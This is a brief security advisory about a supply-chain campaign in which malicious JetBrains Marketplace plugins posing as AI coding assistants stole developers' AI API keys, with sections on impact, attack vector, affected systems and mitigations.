What happened
A coordinated supply-chain campaign between October 2025 and June 2026 published at least 15 malicious JetBrains plugins that exfiltrate AI provider API keys. Two prominent plugins (CodeGPT, DeepSeek AI Assist) each had over 25,000 downloads. The plugins were confirmed to still contain credential-theft code at the time of reporting on June 16, 2026.
Why it matters
AI developers are a high-value target: their API keys grant access to frontier models and cost money to exploit. This supply-chain attack directly compromises the development tools used to build AI systems. Stolen keys can be resold, used for reconnaissance, or used to poison datasets via API manipulation.
Attack vector
Attacker publishes malicious IDE plugins under different vendor accounts on the JetBrains Marketplace. The plugins pose as legitimate AI coding assistants (CodeGPT, DeepSeek AI Assist, etc.) and include code review, commit message, and Git utility features. When a developer enters their API key into the plugin settings, the plugin exfiltrates the key to an attacker-controlled server over plain HTTP.
Affected systems
JetBrains IDE marketplace plugins (15 malicious extensions); affects developers using OpenAI, DeepSeek, and SiliconFlow integrations
Mitigation
JetBrains: implement code scanning for credential-theft patterns in marketplace plugins. Developers: use IDE credential managers with encryption; rotate API keys immediately; enable API key usage monitoring and rate-limit alerts.